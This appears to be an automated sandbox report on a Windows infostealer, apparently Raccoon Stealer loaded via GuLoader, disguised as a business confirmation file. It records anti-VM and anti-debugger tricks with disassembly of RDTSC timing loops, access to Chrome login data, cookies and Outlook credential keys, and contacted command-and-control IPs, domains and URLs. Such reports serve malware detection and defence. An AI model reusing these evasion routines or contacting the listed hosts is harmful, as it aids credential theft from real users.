Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File created: C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\libEGL.dll
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Process information set: NOOPENFILEERRORBOX (13 occurrences)
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\timeout.exe Process information set: NOOPENFILEERRORBOX (2 occurrences)

Malware Analysis System Evasion:

Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe RDTSC instruction interceptor: First address: 00000000004F4854 second address: 00000000004F4854 instructions:
  0x00000000 rdtsc
  0x00000002 xor eax, eax
  0x00000004 inc eax
  0x00000005 cpuid
  0x00000007 popad
  0x00000008 call 00007F1B00D673F8h
  0x0000000d lfence
  0x00000010 mov edx, dword ptr [7FFE0014h]
  0x00000016 lfence
  0x00000019 ret
  0x0000001a sub edx, esi
  0x0000001c ret
  0x0000001d add edi, edx
  0x0000001f dec dword ptr [ebp+000000F8h]
  0x00000025 cmp dword ptr [ebp+000000F8h], 00000000h
  0x0000002c jne 00007F1B00D673DCh
  0x0000002e call 00007F1B00D67413h
  0x00000033 call 00007F1B00D67408h
  0x00000038 lfence
  0x0000003b mov edx, dword ptr [7FFE0014h]
  0x00000041 lfence
  0x00000044 ret
  0x00000045 mov esi, edx
  0x00000047 pushad
  0x00000048 rdtsc
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe RDTSC instruction interceptor: First address: 00000000004F2F21 second address: 00000000004F2F21 instructions:
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe RDTSC instruction interceptor: First address: 00000000004F07D5 second address: 00000000004F07D5 instructions:
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe RDTSC instruction interceptor: First address: 00000000004F1E36 second address: 00000000004F1E36 instructions:
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe RDTSC instruction interceptor: First address: 0000000000562CA5 second address: 0000000000562CA5 instructions:
Tries to detect Any.run
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000000.00000002.798629979.000000000076A000.00000004.00000020.sdmp, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849718672.0000000000561000.00000040.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe RDTSC instruction interceptor: First address: 000000000040C72F second address: 000000000040C72F instructions:
  0x00000000 rdtsc
  0x00000002 cmp dh, FFFFFF98h
  0x00000005 xor eax, edx
  0x00000007 fsqrt
  0x00000009 jmp 00007F1B00D61E6Fh
  0x0000000e cmp cl, 00000036h
  0x00000011 dec edi
  0x00000012 cmp di, 009Eh
  0x00000017 cmp edi, 00000000h
  0x0000001a jne 00007F1B00D61BC5h
  0x00000020 cmp ah, 0000006Ch
  0x00000023 mov ebx, 00458D3Dh
  0x00000028 cmp ax, 000000B3h
  0x0000002c xor ebx, 00385DF4h
  0x00000032 cmp esi, 5Bh
  0x00000035 fdecstp
  0x00000037 jmp 00007F1B00D61E6Ch
  0x0000003c sub ebx, 003E5A87h
  0x00000042 cmp al, BBh
  0x00000044 xor ebx, 007F7642h
  0x0000004a cmp ch, FFFFFF91h
  0x0000004d cmp eax, 1Dh
  0x00000050 rdtsc
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe RDTSC instruction interceptor: First address: 00000000004F4854 second address: 00000000004F4854 instructions:
  0x00000000 rdtsc
  0x00000002 xor eax, eax
  0x00000004 inc eax
  0x00000005 cpuid
  0x00000007 popad
  0x00000008 call 00007F1B00D673F8h
  0x0000000d lfence
  0x00000010 mov edx, dword ptr [7FFE0014h]
  0x00000016 lfence
  0x00000019 ret
  0x0000001a sub edx, esi
  0x0000001c ret
  0x0000001d add edi, edx
  0x0000001f dec dword ptr [ebp+000000F8h]
  0x00000025 cmp dword ptr [ebp+000000F8h], 00000000h
  0x0000002c jne 00007F1B00D673DCh
  0x0000002e call 00007F1B00D67413h
  0x00000033 call 00007F1B00D67408h
  0x00000038 lfence
  0x0000003b mov edx, dword ptr [7FFE0014h]
  0x00000041 lfence
  0x00000044 ret
  0x00000045 mov esi, edx
  0x00000047 pushad
  0x00000048 rdtsc
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe RDTSC instruction interceptor: First address: 00000000004F4874 second address: 00000000004F4874 instructions:
  0x00000000 rdtsc
  0x00000002 lfence
  0x00000005 shl edx, 20h
  0x00000008 or edx, eax
  0x0000000a ret
  0x0000000b mov esi, edx
  0x0000000d pushad
  0x0000000e xor eax, eax
  0x00000010 inc eax
  0x00000011 cpuid
  0x00000013 bt ecx, 1Fh
  0x00000017 jc 00007F1B00D62159h
  0x0000001d popad
  0x0000001e call 00007F1B00D61E6Fh
  0x00000023 lfence
  0x00000026 rdtsc
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe RDTSC instruction interceptor: First address: 00000000004F2F21 second address: 00000000004F2F21 instructions:
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe RDTSC instruction interceptor: First address: 00000000004F07D5 second address: 00000000004F07D5 instructions:
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe RDTSC instruction interceptor: First address: 00000000004F1E36 second address: 00000000004F1E36 instructions:
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe RDTSC instruction interceptor: First address: 00000000004F1F21 second address: 00000000004F239C instructions:
  0x00000000 rdtsc
  0x00000002 lfence
  0x00000005 shl edx, 20h
  0x00000008 or edx, eax
  0x0000000a popad
  0x0000000b add edi, 00001400h
  0x00000011 test bl, al
  0x00000013 mov eax, edi
  0x00000015 mov ebx, eax
  0x00000017 add ebx, 08h
  0x0000001a mov dword ptr [eax], ebx
  0x0000001c add ebx, 04h
  0x0000001f mov dword ptr [eax+04h], ebx
  0x00000022 sub edi, 00000400h
  0x00000028 push edi
  0x00000029 call 00007F1B00D621E0h
  0x0000002e test cl, bl
  0x00000030 push dword ptr [esp+04h]
  0x00000034 jmp 00007F1B00D62D89h
  0x00000039 call 00007F1B00D60DBCh
  0x0000003e cmp dl, al
  0x00000040 pop eax
  0x00000041 pushad
  0x00000042 lfence
  0x00000045 rdtsc
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe RDTSC instruction interceptor: First address: 0000000000564874 second address: 0000000000564874 instructions:
  0x00000000 rdtsc
  0x00000002 lfence
  0x00000005 shl edx, 20h
  0x00000008 or edx, eax
  0x0000000a ret
  0x0000000b mov esi, edx
  0x0000000d pushad
  0x0000000e xor eax, eax
  0x00000010 inc eax
  0x00000011 cpuid
  0x00000013 bt ecx, 1Fh
  0x00000017 jc 00007F1B00D677A9h
  0x0000001d popad
  0x0000001e call 00007F1B00D674BFh
  0x00000023 lfence
  0x00000026 rdtsc
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe RDTSC instruction interceptor: First address: 0000000000562CA0 second address: 0000000000562CA5 instructions:
  0x00000000 rdtsc
  0x00000002 popad
  0x00000003 push eax
  0x00000004 pushad
  0x00000005 rdtsc
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe RDTSC instruction interceptor: First address: 0000000000562CA5 second address: 0000000000562CA5 instructions:
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Dropped PE files which have not been started (all under C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\):
  api-ms-win-core-rtlsupport-l1-1-0.dll
  nssdbm3.dll
  api-ms-win-core-synch-l1-2-0.dll
  api-ms-win-crt-environment-l1-1-0.dll
  api-ms-win-crt-utility-l1-1-0.dll
  MapiProxy_InUse.dll
  freebl3.dll
  api-ms-win-core-processthreads-l1-1-1.dll
  softokn3.dll
  api-ms-win-crt-string-l1-1-0.dll
  AccessibleMarshal.dll
  api-ms-win-core-processenvironment-l1-1-0.dll
  ldap60.dll
  api-ms-win-core-file-l2-1-0.dll
  api-ms-win-core-memory-l1-1-0.dll
  api-ms-win-core-synch-l1-1-0.dll
  api-ms-win-crt-stdio-l1-1-0.dll
  api-ms-win-core-profile-l1-1-0.dll
  api-ms-win-crt-time-l1-1-0.dll
  api-ms-win-crt-private-l1-1-0.dll
  api-ms-win-core-timezone-l1-1-0.dll
  api-ms-win-core-heap-l1-1-0.dll
  api-ms-win-crt-multibyte-l1-1-0.dll
  api-ms-win-crt-process-l1-1-0.dll
  api-ms-win-core-interlocked-l1-1-0.dll
  qipcap.dll
  lgpllibs.dll
  api-ms-win-crt-filesystem-l1-1-0.dll
  mozMapi32_InUse.dll
  ldif60.dll
  prldap60.dll
  api-ms-win-core-namedpipe-l1-1-0.dll
  api-ms-win-core-file-l1-2-0.dll
  api-ms-win-core-string-l1-1-0.dll
  api-ms-win-crt-math-l1-1-0.dll
  api-ms-win-crt-locale-l1-1-0.dll
  mozMapi32.dll
  api-ms-win-core-libraryloader-l1-1-0.dll
  breakpadinjector.dll
  MapiProxy.dll
  api-ms-win-crt-heap-l1-1-0.dll
  api-ms-win-crt-conio-l1-1-0.dll
  api-ms-win-core-processthreads-l1-1-0.dll
  api-ms-win-core-util-l1-1-0.dll
  api-ms-win-core-sysinfo-l1-1-0.dll
  nssckbi.dll
  api-ms-win-crt-convert-l1-1-0.dll
  AccessibleHandler.dll
  api-ms-win-core-handle-l1-1-0.dll
  IA2Marshal.dll
  api-ms-win-core-localization-l1-2-0.dll
  api-ms-win-crt-runtime-l1-1-0.dll
  libEGL.dll
Is looking for software installed on the system
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Registry key enumerated: More than 152 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe TID: 6772 Thread sleep count: 193 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 6712 Thread sleep count: 86 > 30
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.853428201.0000000066C40000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849907601.00000000009A8000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.853428201.0000000066C40000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000000.00000002.798629979.000000000076A000.00000004.00000020.sdmp, CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.849718672.0000000000561000.00000040.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.853428201.0000000066C40000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe, 00000004.00000002.853428201.0000000066C40000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Thread information set: HideFromDebugger (2 identical entries)
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Process queried: DebugPort

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Raccoon Stealer
Source: Yara match File source: Process Memory Space: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe PID: 5668, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Source: C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Remote Access Functionality:

Yara detected Raccoon Stealer
Source: Yara match File source: Process Memory Space: CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe PID: 5668, type: MEMORY

Behavior Graph (rendered graph not reproducible here; node text retained):

Behavior Graph ID: 378098
Sample: CopyDocs-BUSINESS-CONFIRMAT...
Startdate: 30/03/2021
Architecture: WINDOWS
Score: 100
Top-level signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Yara detected GuLoader; 3 other signatures

Process tree:
  CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe 1 (started)
    Signatures: Detected RDTSC dummy instruction sequence (likely for instruction hammering); Tries to detect virtualization through RDTSC time measurements
    CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe 80 (started)
      DNS/IP: telete.in 195.201.225.248, 443, 49743 HETZNER-ASDE Germany; 45.139.236.6, 49744, 80 TEAM-HOSTASRU Russian Federation; ekocafebali.com 111.67.28.15, 443, 49742 DIGITALPACIFIC-AUDigitalPacificPtyLtdAustraliaAU Australia
      Dropped: C:\Users\user\AppData\LocalLow\sqlite3.dll, PE32; C:\Users\user\AppData\...\vcruntime140.dll, PE32; C:\Users\user\AppData\...\ucrtbase.dll, PE32; 56 other files (none is malicious)
      Signatures: Tries to steal Mail credentials (via file access); Tries to harvest and steal browser information (history, passwords, etc); Tries to detect Any.run; Hides threads from debuggers
      cmd.exe 1 (started)
        conhost.exe (started)
        timeout.exe 1 (started)

Contacted Public IPs

IP | Domain | Country | ASN | ASN Name | Malicious
195.201.225.248 | telete.in | Germany | 24940 | HETZNER-ASDE | true
45.139.236.6 | unknown | Russian Federation | 202984 | TEAM-HOSTASRU | false
111.67.28.15 | ekocafebali.com | Australia | 55803 | DIGITALPACIFIC-AUDigitalPacificPtyLtdAustraliaAU | false

Contacted Domains

Name | IP | Active
telete.in | 195.201.225.248 | true
ekocafebali.com | 111.67.28.15 | true

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://45.139.236.6//l/f/7y4Wg3gBuI_ccNKoGwkK/0a3546e5040ab5a4b3cac44b064a321d51adba4a | false | Avira URL Cloud: safe | unknown
http://45.139.236.6/ | false | Avira URL Cloud: safe | unknown
http://45.139.236.6//l/f/7y4Wg3gBuI_ccNKoGwkK/7a6d75ef6f646f4419fc28f58e62a7952e597921 | false | Avira URL Cloud: safe | unknown